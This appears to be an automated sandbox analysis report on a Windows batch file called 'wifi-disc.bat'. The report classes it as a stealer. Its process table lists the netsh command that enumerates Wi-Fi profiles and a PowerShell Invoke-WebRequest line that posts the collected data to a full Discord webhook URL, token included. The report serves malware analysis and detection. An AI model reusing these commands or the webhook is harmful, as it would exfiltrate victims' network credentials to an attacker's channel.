| File name: | wifi-disc.bat |
| Full analysis: | https://app.any.run/tasks/f31ebace-0822-478a-9f62-f950a19916c1 |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | December 07, 2024, 04:11:36 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text |
| MD5: | 0BE14A9A67EFA7DE47EF365F23E7ACD2 |
| SHA1: | 56B130E705C3C02470BC2CF2D233C5402FF4B61B |
| SHA256: | B6B9657DC7D6752ADF9DD6AEC5A5F55618995E8F90A777638A103C70C6525092 |
| SSDEEP: | 24:g6Tjc9gQ0syly9ocI+QK1qNCvDwEInw+f4WbvzXb:A7ODpEInw+f7vLb |
MALICIOUS
Attempting to use instant messaging service
- powershell.exe (PID: 524)
Stealers network behavior
- powershell.exe (PID: 524)
SUSPICIOUS
Uses NETSH.EXE to obtain data on the network
- cmd.exe (PID: 4188)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3796)
Using 'findstr.exe' to search for text patterns in files and output
- cmd.exe (PID: 4188)
Application launched itself
- cmd.exe (PID: 3796)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 3796)
The process connected to a server suspected of theft
- powershell.exe (PID: 524)
Possible usage of Discord/Telegram API has been detected (YARA)
- cmd.exe (PID: 3796)
INFO
Checks proxy server information
- powershell.exe (PID: 524)
Disables trace logs
- powershell.exe (PID: 524)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 524)
Attempting to use instant messaging service
- powershell.exe (PID: 524)
Reads Internet Explorer settings
- powershell.exe (PID: 524)
Remote server returned an error (POWERSHELL)
- powershell.exe (PID: 524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
ims-api
(PID) Process(3796) cmd.exe
Discord-Webhook-Tokens (1)1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN
Discord-Info-Links
1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN
Get Webhook Infohttps://discord.com/api/webhooks/1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN
Total processes
126
Monitored processes
6
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 524 | powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN' -Method Post -ContentType 'application/json' -InFile 'temp.json').StatusCode" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | findstr "All User Profile" | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3436 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3796 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wifi-disc.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
ims-api(PID) Process(3796) cmd.exe Discord-Webhook-Tokens (1)1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN Discord-Info-Links 1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN Get Webhook Infohttps://discord.com/api/webhooks/1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN | |||||||||||||||
| 3848 | netsh wlan show profiles | C:\Windows\System32\netsh.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4188 | C:\WINDOWS\system32\cmd.exe /c netsh wlan show profiles | findstr "All User Profile" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
5 183
Read events
5 183
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3796 | cmd.exe | C:\Users\admin\Desktop\temp.json | binary | |
MD5:21C788B347A33914E1E38265D4FF2788 | SHA256:F4EE7DC9B20AEC7DDB7B6A777A3CC3493A20F2A4F57E0272600CBF580E35ED71 | |||
| 524 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lnpoamu0.gaa.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 524 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uelh4ngm.0ih.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 524 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:3CF5DE4C19A4426DF50F9ABEAA41D9D0 | SHA256:C017896EAF629F0C2DD7BD24757982E56ACEE57200C39C4BCA8D7997AF206945 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
18
DNS requests
7
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2084 | RUXIMICS.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2380 | svchost.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2084 | RUXIMICS.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2380 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | 404 | 162.159.135.232:443 | https://discord.com/api/webhooks/1314797575609516133/aXYV_1TpALcq5VDNPt0MM6_1wLW4lSrMSoap6xP9sTGksfxDmhj3NuILkG_Jes5rD1xN | unknown | binary | 45 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2084 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2380 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2084 | RUXIMICS.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2380 | svchost.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2084 | RUXIMICS.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
discord.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
524 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
524 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |